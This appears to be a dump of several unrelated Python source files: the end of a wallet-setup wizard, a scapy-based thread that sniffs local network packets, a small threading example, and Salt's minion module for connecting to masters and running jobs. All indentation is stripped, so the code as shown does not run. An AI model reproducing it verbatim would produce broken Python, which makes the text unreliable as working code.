WizardConfirmDialog(self, **kwargs).open()
def tos_dialog(self, **kwargs):
WizardTOSDialog(self, **kwargs).open()
def email_dialog(self, **kwargs):
WizardEmailDialog(self, **kwargs).open()
def otp_dialog(self, **kwargs):
if kwargs['otp_secret']:
WizardNewOTPDialog(self, **kwargs).open()
else:
WizardKnownOTPDialog(self, **kwargs).open()
def add_xpub_dialog(self, **kwargs):
kwargs['message'] += ' ' + _('Use the camera button to scan a QR code.')
AddXpubDialog(self, **kwargs).open()
def add_cosigner_dialog(self, **kwargs):
kwargs['title'] = _("Add Cosigner") + " %d"%kwargs['index']
kwargs['message'] = _('Please paste your cosigners master public key, or scan it using the camera button.')
AddXpubDialog(self, **kwargs).open()
def show_xpub_dialog(self, **kwargs): ShowXpubDialog(self, **kwargs).open()
def show_message(self, msg): self.show_error(msg)
def show_error(self, msg):
app = App.get_running_app()
Clock.schedule_once(lambda dt: app.show_error(msg))
def request_password(self, run_next, force_disable_encrypt_cb=False):
if force_disable_encrypt_cb:
# do not request PIN for watching-only wallets
run_next(None, False)
return
def on_success(old_pin, pin):
assert old_pin is None
run_next(pin, False)
def on_failure():
self.show_error(_('PIN mismatch'))
self.run('request_password', run_next)
popup = PasswordDialog()
app = App.get_running_app()
popup.init(app, None, _('Choose PIN code'), on_success, on_failure, is_change=2)
popup.open()
def action_dialog(self, action, run_next):
f = getattr(self, action)
f()
|
packet_capture.py
|
"""
Thread that continuously captures and processes packets.
"""
import scapy.all as sc
import threading
import utils
from host_state import HostState
import time
class PacketCapture(object):
def __init__(self, host_state):
assert isinstance(host_state, HostState)
self._host_state = host_state
self._lock = threading.Lock()
self._active = True
self._thread = threading.Thread(target=self._capture_packets)
self._thread.daemon = True
def start(self):
with self._lock:
self._active = True
utils.log('[Packet Capture] Starting.')
self._thread.start()
def _capture_packets(self):
while True:
result = utils.safe_run(sc.sniff, kwargs={
'prn': self._host_state.packet_processor.process_packet,
'stop_filter': lambda _: not self._is_active(),
'filter': 'arp or (host not {} and ether host {})'.format(
self._host_state.host_ip,
self._host_state.host_mac
),
'timeout': 30
})
if isinstance(result, utils._SafeRunError):
time.sleep(1)
def _is_active(self):
with self._lock:
return self._active
def stop(self):
utils.log('[Packet Capture] Stopping.')
with self._lock:
self._active = False
self._thread.join()
utils.log('[Packet Capture] Stopped.')
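# Hedged usage sketch (not part of the original module). Assumes a fully
# populated HostState instance (host_ip, host_mac and packet_processor set),
# which the surrounding application is expected to build:
#
#     state = HostState()             # assumption: no-arg constructor
#     capture = PacketCapture(state)
#     capture.start()
#     time.sleep(60)                  # let it capture for a while
#     capture.stop()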
|
multiThreading.py
|
import threading, time
print('Start of program.')
def takeANap():
time.sleep(5)
print('Wake up!')
threadObj = threading.Thread(target=takeANap)
threadObj.start()
print('End of Program.')
print('-' * 40)
threadObj2 = threading.Thread(target=print, args=['Cats', 'Dogs', 'Frogs'], kwargs={'sep': ' & '})
threadObj2.start()
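# A hedged extension of the example above (not part of the original script):
# join() blocks the calling thread until the worker finishes, which is how
# the main program would wait for takeANap() and the print() thread.
threadObj.join()
threadObj2.join()
print('All threads have finished.')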
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function, with_statement
import os
import re
import sys
import copy
import time
import types
import signal
import fnmatch
import logging
import threading
import traceback
import contextlib
import multiprocessing
from random import randint, shuffle
from stat import S_IMODE
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
import salt.ext.six as six
if six.PY3:
import ipaddress
else:
import salt.ext.ipaddress as ipaddress
from salt.ext.six.moves import range
# pylint: enable=no-name-in-module,redefined-builtin
# Import third party libs
try:
import zmq
# TODO: cleanup
import zmq.eventloop.ioloop
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
HAS_ZMQ = True
except ImportError:
# Running in local, zmq not needed
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.payload
import salt.syspaths
import salt.utils
import salt.utils.context
import salt.utils.jid
import salt.pillar
import salt.utils.args
import salt.utils.event
import salt.utils.minions
import salt.utils.schedule
import salt.utils.error
import salt.utils.zeromq
import salt.defaults.exitcodes
import salt.cli.daemons
import salt.log.setup
from salt.config import DEFAULT_MINION_OPTS
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.executors import FUNCTION_EXECUTORS
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.utils.process import default_signals, SignalHandlingMultiprocessingProcess
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit,
SaltDaemonNotRunning
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
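# Hedged sketch (not part of the original module): the programmatic
# equivalent of the steps above looks roughly like
#   opts = salt.config.minion_config('/etc/salt/minion')
#   minion = salt.minion.Minion(opts)
#   minion.sync_connect_master()      # steps 3-5
#   minion.tune_in(start=False)       # step 6: handle publications
# exact entry points vary between Salt releases.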
def resolve_dns(opts):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
if check_dns is True:
# Because I import salt.log below I need to re-import salt.utils here
import salt.utils
try:
if opts['master'] == '':
raise SaltSystemExit
ret['master_ip'] = \
salt.utils.dns_check(opts['master'], True, opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found. Retrying in {1} '
'seconds').format(opts['master'], opts['retry_dns'])
if salt.log.setup.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.dns_check(
opts['master'], True, opts['ipv6']
)
break
except SaltClientError:
pass
else:
ret['master_ip'] = '127.0.0.1'
except SaltSystemExit:
unknown_str = 'unknown address'
master = opts.get('master', unknown_str)
if master == '':
master = unknown_str
if opts.get('__role') == 'syndic':
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolvable address. Set \'syndic_master\' value in minion config.'.format(master)
else:
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolvable address. Set \'master\' value in minion config.'.format(master)
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
ret['master_ip'])
)
ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
port=opts['master_port'])
return ret
def prep_ip_port(opts):
ret = {}
if opts['master_uri_format'] == 'ip_only':
ret['master'] = opts['master']
else:
ip_port = opts['master'].rsplit(":", 1)
if len(ip_port) == 1:
# e.g. master: mysaltmaster
ret['master'] = ip_port[0]
else:
# e.g. master: localhost:1234
# e.g. master: 127.0.0.1:1234
# e.g. master: ::1:1234
ret['master'] = ip_port[0]
ret['master_port'] = ip_port[1]
return ret
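# Hedged illustration (not part of the original source): assuming
# opts = {'master_uri_format': 'default', 'master': '127.0.0.1:4506'},
# prep_ip_port(opts) returns {'master': '127.0.0.1', 'master_port': '4506'};
# with 'master': 'mysaltmaster' (no port) only {'master': 'mysaltmaster'}
# is returned and the configured master_port is left untouched.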
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional keyword arguments are handled:
mode: anything os.makedirs would accept as a mode.
uid: the uid to set; if it is not given, None, or -1, no change is
made. The same applies if the directory is already owned by this
uid. Must be an int. Works only on unix/unix-like systems.
gid: the gid to set; if it is not given, None, or -1, no change is
made. The same applies if the directory is already owned by this
gid. Must be an int. Works only on unix/unix-like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So let's check if the mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
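# Hedged illustration (not part of the original source): a typical call is
#   get_proc_dir('/var/cache/salt/minion', mode=0o700, uid=0, gid=0)
# which creates <cachedir>/proc with the given mode and owner if needed and
# returns its path.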
def parse_args_and_kwargs(func, args, data=None):
'''
Wrap load_args_and_kwargs
'''
salt.utils.warn_until(
'Boron',
'salt.minion.parse_args_and_kwargs() has been renamed to '
'salt.minion.load_args_and_kwargs(). Please change this function call '
'before the Boron release of Salt.'
)
return load_args_and_kwargs(func, args, data=data)
def load_args_and_kwargs(func, args, data=None, ignore_invalid=False):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, six.string_types):
string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632
if string_arg:
# Don't append the version that was just derived from parse_cli
# above, that would result in a 2nd call to
# salt.utils.cli.yamlify_arg(), which could mangle the input.
_args.append(arg)
elif string_kwarg:
salt.utils.warn_until(
'Boron',
'The list of function args and kwargs should be parsed '
'by salt.utils.args.parse_input() before calling '
'salt.minion.load_args_and_kwargs().'
)
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
# if the arg is a dict with __kwarg__ == True, then its a kwarg
elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
_args.append(arg)
if invalid_kwargs and not ignore_invalid:
salt.utils.invalid_kwargs(invalid_kwargs)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
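# Hedged illustration (not part of the original source): for a function that
# accepts **kwargs,
#   load_args_and_kwargs(func, ['foo', {'__kwarg__': True, 'bar': 1}])
# returns (['foo'], {'bar': 1}); plain strings stay positional while dicts
# flagged with __kwarg__ are unpacked into the kwargs dict.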
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
minion.schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons; grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons')
if b_conf:
return self.beacons.process(b_conf) # pylint: disable=no-member
return []
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func, it evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover, it takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
returned. If this function is called outside the minion's initialization
phase (for example from the minion's main event loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
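# Hedged illustration (not part of the original source): a failover setup
# would typically come from minion config along the lines of
#   master_type: failover
#   master:
#     - master1.example.com
#     - master2.example.com
# and this coroutine then walks that list until one master accepts the
# connection.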
# check if master_type was altered from its default
if opts['master_type'] != 'str' and opts['__role'] != 'syndic':
# check for a valid keyword
if opts['master_type'] == 'func':
# split module and function and try loading the module
mod, fun = opts['master'].split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise TypeError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod + '.' + fun]()
except TypeError:
msg = ('Failed to evaluate master address from '
'module \'{0}\''.format(opts['master']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: {0}'.format(master_mod))
# if failover is set, master has to be of type list
elif opts['master_type'] == 'failover':
if isinstance(opts['master'], list):
log.info('Got list of available master addresses:'
' {0}'.format(opts['master']))
if opts['master_shuffle']:
shuffle(opts['master'])
# if opts['master'] is a str and we have never created opts['master_list']
elif isinstance(opts['master'], str) and ('master_list' not in opts):
# We have a string, but a list was what was intended. Convert.
# See issue 23611 for details
opts['master'] = [opts['master']]
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master']))
# if failed=True, the minion was previously connected;
# we're probably called from the minion's main event loop
# because a master connection loss was detected. Remove
# the possibly failed master from the list of masters.
elif failed:
log.info('Removing possibly failed master {0} from list of'
' masters'.format(opts['master']))
# create new list of master with the possibly failed one removed
opts['master'] = [x for x in opts['master_list'] if opts['master'] != x]
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# If failover is set, the minion has to fail over on DNS errors instead of retrying DNS resolution.
# See issue 21082 for details
if opts['retry_dns']:
msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. '
'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.')
log.critical(msg)
opts['retry_dns'] = 0
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop
# (The channel factories will set a default if the kwarg isn't passed)
factory_kwargs = {'timeout': timeout, 'safe': safe}
if getattr(self, 'io_loop', None):
factory_kwargs['io_loop'] = self.io_loop # pylint: disable=no-member
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
# shuffle the masters and then loop through them
local_masters = copy.copy(opts['master'])
for master in local_masters:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
self.opts = opts
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = local_masters
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs)
yield pub_channel.connect()
conn = True
break
except SaltClientError:
msg = ('Master {0} could not be reached, trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
if not conn:
self.connected = False
msg = ('No master could be reached or all masters denied '
"the minion's connection attempt.")
log.error(msg)
else:
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
class SMinion(MinionBase):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and presents them for
general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
opts['grains'] = salt.loader.grains(opts)
super(SMinion, self).__init__(opts)
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
self.eval_master(self.opts, failed=True)
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils,
include_errors=True)
self.serializers = salt.loader.serializers(self.opts)
self.returners = salt.loader.returners(self.opts, self.functions)
self.proxy = salt.loader.proxy(self.opts, self.functions, self.returners, None)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts)
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted; otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None):
self.opts = salt.config.minion_config(opts['conf_file'])
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
self.serializers = salt.loader.serializers(self.opts)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MultiMinion(MinionBase):
'''
Create a multi-minion interface; this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
# timeout for one of the minions to auth with a master
MINION_CONNECT_TIMEOUT = 5
def __init__(self, opts):
super(MultiMinion, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
zmq.eventloop.ioloop.install()
self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
def _spawn_minions(self):
'''
Spawn all the coroutines which will sign in to masters
'''
if not isinstance(self.opts['master'], list):
log.error(
'Attempting to start a multimaster system with one master')
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
for master in set(self.opts['master']):
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
s_opts['auth_timeout'] = self.MINION_CONNECT_TIMEOUT
self.io_loop.spawn_callback(self._connect_minion, s_opts)
@tornado.gen.coroutine
def _connect_minion(self, opts):
'''
Create a minion, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
try:
minion = Minion(opts,
self.MINION_CONNECT_TIMEOUT,
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(opts['master']),
)
yield minion.connect_master()
minion.tune_in(start=False)
break
except SaltClientError as exc:
log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except Exception as e:
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
# Fire off all the minion coroutines
self.minions = self._spawn_minions()
# serve forever!
self.io_loop.start()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
if io_loop is None:
zmq.eventloop.ioloop.install()
self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
else:
self.io_loop = io_loop
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')] # pylint: disable=no-member
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup of the opts grains, so we can log from the grains
# module. If this is a proxy, however, we need to init the proxymodule
# before we can get the grains.
if not salt.utils.is_proxy():
self.opts['grains'] = salt.loader.grains(opts)
def sync_connect_master(self, timeout=None):
'''
Block until we are connected to a master
'''
self._sync_connect_master_success = False
log.debug("sync_connect_master")
def on_connect_master_future_done(future):
self._sync_connect_master_success = True
self.io_loop.stop()
self._connect_master_future = self.connect_master()
# finish connecting to master
self._connect_master_future.add_done_callback(on_connect_master_future_done)
if timeout:
self.io_loop.call_later(timeout, self.io_loop.stop)
self.io_loop.start()
# I made the following 3 line oddity to preserve traceback.
# Please read PR #23978 before changing, hopefully avoiding regressions.
# Good luck, we're all counting on you. Thanks.
future_exception = self._connect_master_future.exc_info()
if future_exception:
raise six.reraise(*future_exception)
if timeout and self._sync_connect_master_success is False:
raise SaltDaemonNotRunning('Failed to connect to the salt-master')
@tornado.gen.coroutine
def connect_master(self):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe)
yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
'''
self.opts['master'] = master
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv')
).compile_pillar()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minion's scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if self.opts['master_alive_interval'] > 0:
self.schedule.add_job({
'__master_alive':
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
self.grains_cache = self.opts['grains']
def _return_retry_timer(self):
'''
Based on the minion configuration, either return a randomized timer or
just return the value of the return_retry_timer.
'''
msg = 'Minion return retry timer set to {0} seconds'
if self.opts.get('return_retry_timer_max'):
try:
random_retry = randint(self.opts['return_retry_timer'], self.opts['return_retry_timer_max'])
log.debug(msg.format(random_retry) + ' (randomized)')
return random_retry
except ValueError:
# Catch wiseguys using negative integers here
log.error(
'Invalid value (return_retry_timer: {0} or return_retry_timer_max: {1}); '
'both must be positive integers'.format(
self.opts['return_retry_timer'],
self.opts['return_retry_timer_max'],
)
)
log.debug(msg.format(DEFAULT_MINION_OPTS['return_retry_timer']))
return DEFAULT_MINION_OPTS['return_retry_timer']
else:
log.debug(msg.format(self.opts.get('return_retry_timer')))
return self.opts.get('return_retry_timer')
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _process_beacons(self):
'''
Process each beacon and send events if appropriate
'''
# Process Beacons
try:
beacons = self.process_beacons(self.functions)
except Exception as exc:
log.critical('Beacon processing failed: {0}. No beacons will be processed.'.format(traceback.format_exc(exc)))
beacons = None
if beacons:
self._fire_master(events=beacons)
for beacon in beacons:
serialized_data = salt.utils.dicttrim.trim_dict(
self.serial.dumps(beacon['data']),
self.opts.get('max_event_size', 1048576),
is_msgpacked=True,
)
log.debug('Sending event - data = {0}'.format(beacon['data']))
event = '{0}{1}{2}'.format(
beacon['tag'],
salt.utils.event.TAGEND,
serialized_data,
)
self.event_publisher.handle_publish([event])
def _load_modules(self, force_refresh=False, notify=False, proxy=None):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).memory_info()
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh)
self.utils = salt.loader.utils(self.opts)
if self.opts.get('multimaster', False):
s_opts = copy.deepcopy(self.opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils, proxy=proxy,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify, proxy=proxy)
returners = salt.loader.returners(self.opts, functions)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
executors = salt.loader.executors(self.opts, functions)
return functions, returners, errors, executors
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
channel = salt.transport.Channel.factory(self.opts)
try:
result = channel.send(load, timeout=timeout)
return True
except Exception:
log.info('fire_master failed: {0}'.format(traceback.format_exc()))
return False
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
if 'user' in data:
log.info(
'User {0[user]} Executing command {0[fun]} with jid '
'{0[jid]}'.format(data)
)
else:
log.info(
'Executing command {0[fun]} with jid {0[jid]}'.format(data)
)
log.debug('Command details {0}'.format(data))
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
# We stash an instance reference to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
multiprocessing_enabled = self.opts.get('multiprocessing', True)
if multiprocessing_enabled:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
process = SignalHandlingMultiprocessingProcess(
target=self._target, args=(instance, self.opts, data)
)
else:
process = threading.Thread(
target=self._target,
args=(instance, self.opts, data),
name=data['jid']
)
if multiprocessing_enabled:
with default_signals(signal.SIGINT, signal.SIGTERM):
# Reset current signals before starting the process in
# order not to inherit the current signal handlers
process.start()
else:
process.start()
# TODO: remove the windows specific check?
